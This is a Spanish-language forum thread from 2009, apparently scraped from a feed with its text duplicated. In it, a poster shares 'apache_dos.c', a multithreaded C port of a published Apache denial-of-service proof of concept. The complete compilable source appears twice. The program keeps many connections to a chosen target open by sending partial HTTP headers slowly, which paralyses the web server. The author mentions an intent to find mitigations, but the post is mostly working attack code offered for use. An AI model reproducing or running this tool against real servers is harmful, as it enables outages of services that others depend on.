apache_dos.c - Apache D.O.S proof-of-concept Hice un pequeño código, basado en el publicado por evilrabbi en milw0rm.com (afiliado!). Esta echo en C y, a diferencia de el mencionado, usa hilos POSIX. Dentro de poco voy a tratar de encontrar una forma temporal de mitigar este tipo de ataques. Si bien ESTE poc no aniquila el servidor httpd solamente lo paraliza mientras se mantenga dicha sesión y en algunos casos el servidor responde con un error. He aquí la aplicación: Language: C/*** * apache_dos.c - C1c4Tr1Z <c1c4tr1z@voodoo-labs.org> * C version of the D.O.S proof-of-concept by evilrabbi (http://www.milw0rm.com/exploits/8991) * voodoo-labs 2009 (http://voodoo-labs.org) & undersecurity (http://foro.undersecurity.net) * compile: gcc -o apache_dos apache_dos.c -lpthread ***/ #include <time.h> #include <stdio.h> #include <netdb.h> #include <getopt.h> #include <string.h> #include <stdlib.h> #include <pthread.h> #include <netinet/in.h> #include <sys/socket.h>   #define PORT 80 #define PTHREADS 30 #define UA "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) "\ "Gecko/2009060309 Ubuntu/8.04 (hardy) Firefox/3.0.11" #define ERROR(x) do{if(x!=NULL)printf("[-]%s\n",x);exit(-1);}while(0); #define GET "GET / HTTP/1.1\r\n"\ "Host: %s\r\n"\ "User-Agent: %s\r\n"\ "Content-Length: %d\r\n"\ "X-a: %d\r\n" #define X "X-a: b\r\n"   static int port=PORT;   void *sendHeaders(const char *address){ int sock; struct sockaddr_in sockaddr; struct hostent *host_s;   if((host_s=gethostbyname(address))==NULL){ perror("[-]gethostbyname()"); pthread_exit(0); }   srand(time(NULL));   memset(&sockaddr, 0, sizeof(struct sockaddr)); sockaddr.sin_port=htons(port); sockaddr.sin_family=AF_INET; memcpy(&sockaddr.sin_addr, host_s->h_addr, host_s->h_length);   if((sock=socket(AF_INET, SOCK_STREAM, 0x06))!=-1){ if((connect(sock, (struct sockaddr*)&sockaddr, sizeof(sockaddr)))!=-1){ dprintf(sock, GET, address, UA, rand()%10000, rand()%1000); while((send(sock, X, strlen(X), 0))!=-1){ /** * you can change the interval time * between each request (def: 10s.) **/ sleep(2); } }else{ perror("[-]connect()"); pthread_exit(0); } close(sock); }else{ perror("[-]socket()"); pthread_exit(0); }   pthread_exit(0); }   int main(int argc, char *argv[]){ int opt, thread, thread_n=PTHREADS; char *server, *ptr;   opterr=0; while((opt=getopt(argc, argv, "t:n:h"))!=-1){ switch(opt){ case('t'): server=(char*)malloc(strlen(optarg)); memset(server, 0, sizeof(server)); if((ptr=strchr(optarg, ':'))!=NULL){ *ptr++='\0'; port=atoi(ptr); } strncpy(server, optarg, strlen(optarg)); break; case('n'): thread_n=atoi(optarg); break; case('?'): printf("[-]option requires an argument (-%c).\n",optopt); case('h'): default: printf( "[+]apache_dos.c - C1c4Tr1Z <c1c4tr1z@voodoo-labs.org>\n" "[+]usage: %s [-n threads] -t <target>[:port]\n", argv[0]); ERROR(NULL); } }   printf("[+]target: %s (%d)\n", server, port); printf("[+]useragent: %s\n", UA);   while(1){ pthread_t pthreads[thread_n]; printf("[+]number of threads: %d\n", thread_n); for(thread=0;thread<thread_n;thread++){ if(pthread_create(&pthreads[thread], NULL, (void*)sendHeaders, (void*)server)!=0){ ERROR("couldn't create a thread."); } } for(thread=0;thread<thread_n;thread++){ pthread_join(pthreads[thread], NULL); } }   return(0); } EDIT: hice varios cambios, pero hasta el momento me cuesta replicar el tipo de ataque realizado por RSnake.https://foro.undersecurity.net/read.php?15,2876,2876#msg-2876Mon, 06 Sep 2010 12:04:29 -0400 Phorum 5.2.15a https://foro.undersecurity.net/read.php?15,2876,3641#msg-3641 Re: apache_dos.c - Apache D.O.S proof-of-concepthttps://foro.undersecurity.net/read.php?15,2876,3641#msg-3641 3n!Gma Vulnerabilidades Nivel Web GeneralThu, 30 Jul 2009 02:58:29 -0400 https://foro.undersecurity.net/read.php?15,2876,2877#msg-2877 Re: apache_dos.c - Apache D.O.S proof-of-concepthttps://foro.undersecurity.net/read.php?15,2876,2877#msg-2877
Saludos,
n0b0dy.]]> n0b0dy Vulnerabilidades Nivel Web GeneralThu, 25 Jun 2009 23:28:50 -0400 https://foro.undersecurity.net/read.php?15,2876,2876#msg-2876 apache_dos.c - Apache D.O.S proof-of-concepthttps://foro.undersecurity.net/read.php?15,2876,2876#msg-2876evilrabbi en milw0rm.com (afiliado!). Esta echo en C y, a diferencia de el mencionado, usa hilos POSIX. Dentro de poco voy a tratar de encontrar una forma temporal de mitigar este tipo de ataques. Si bien ESTE poc no aniquila el servidor httpd solamente lo paraliza mientras se mantenga dicha sesión y en algunos casos el servidor responde con un error.
He aquí la aplicación:
Language: C
/***
 * apache_dos.c - C1c4Tr1Z <c1c4tr1z@voodoo-labs.org>
 * C version of the D.O.S proof-of-concept by evilrabbi (http://www.milw0rm.com/exploits/8991)
 * voodoo-labs 2009 (http://voodoo-labs.org) & undersecurity (http://foro.undersecurity.net)
 * compile: gcc -o apache_dos apache_dos.c -lpthread
 ***/
#include <time.h>
#include <stdio.h>
#include <netdb.h>
#include <getopt.h>
#include <string.h>
#include <stdlib.h>
#include <pthread.h>
#include <netinet/in.h>
#include <sys/socket.h>
 
#define	PORT	80
#define PTHREADS 	30
#define UA		"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) "\
			"Gecko/2009060309 Ubuntu/8.04 (hardy) Firefox/3.0.11"
#define ERROR(x)	do{if(x!=NULL)printf("[-]%s\n",x);exit(-1);}while(0);
#define GET		"GET / HTTP/1.1\r\n"\
			"Host: %s\r\n"\
			"User-Agent: %s\r\n"\
    			"Content-Length: %d\r\n"\
			"X-a: %d\r\n"
#define X		"X-a: b\r\n"
 
static int port=PORT;
 
void *sendHeaders(const char *address){
	int sock;
	struct sockaddr_in sockaddr;
	struct hostent *host_s;
 
	if((host_s=gethostbyname(address))==NULL){
		perror("[-]gethostbyname()");
		pthread_exit(0);
	}
 
	srand(time(NULL));
 
	memset(&sockaddr, 0, sizeof(struct sockaddr));
	sockaddr.sin_port=htons(port);
	sockaddr.sin_family=AF_INET;
	memcpy(&sockaddr.sin_addr, host_s->h_addr, host_s->h_length);
 
	if((sock=socket(AF_INET, SOCK_STREAM, 0x06))!=-1){
		if((connect(sock, (struct sockaddr*)&sockaddr, sizeof(sockaddr)))!=-1){
			dprintf(sock, GET, address, UA, rand()%10000, rand()%1000);
			while((send(sock, X, strlen(X), 0))!=-1){
				/**
				 * you can change the interval time
				 * between each request (def: 10s.)
				 **/
				 sleep(2);
			}
		}else{
			perror("[-]connect()");
			pthread_exit(0);
		}
	close(sock);
	}else{
		perror("[-]socket()");
		pthread_exit(0);
	}
 
	pthread_exit(0);
}
 
int main(int argc, char *argv[]){
	int opt, thread, thread_n=PTHREADS;
	char *server, *ptr;
 
	opterr=0;
	while((opt=getopt(argc, argv, "t:n:h"))!=-1){
		switch(opt){
			case('t'):
				server=(char*)malloc(strlen(optarg));
				memset(server, 0, sizeof(server));
				if((ptr=strchr(optarg, ':'))!=NULL){
					*ptr++='\0';
					port=atoi(ptr);
				}
				strncpy(server, optarg, strlen(optarg));
			break;
			case('n'):
				thread_n=atoi(optarg);
			break;
			case('?'):
				printf("[-]option requires an argument (-%c).\n",optopt);
			case('h'):
			default:
				printf(
					"[+]apache_dos.c - C1c4Tr1Z <c1c4tr1z@voodoo-labs.org>\n"
					"[+]usage: %s [-n threads] -t <target>[:port]\n",
				argv[0]);
				ERROR(NULL);
		}
	}
 
	printf("[+]target: %s (%d)\n", server, port);
	printf("[+]useragent: %s\n", UA);
 
	while(1){
		pthread_t pthreads[thread_n];
		printf("[+]number of threads: %d\n", thread_n);
		for(thread=0;thread<thread_n;thread++){
			if(pthread_create(&pthreads[thread], NULL, (void*)sendHeaders, (void*)server)!=0){
				ERROR("couldn't create a thread.");
			}
		}
		for(thread=0;thread<thread_n;thread++){
			pthread_join(pthreads[thread], NULL);
		}
	}
 
	return(0);
}

EDIT: hice varios cambios, pero hasta el momento me cuesta replicar el tipo de ataque realizado por RSnake.]]> C1c4Tr1Z Vulnerabilidades Nivel Web GeneralThu, 25 Jun 2009 22:17:39 -0400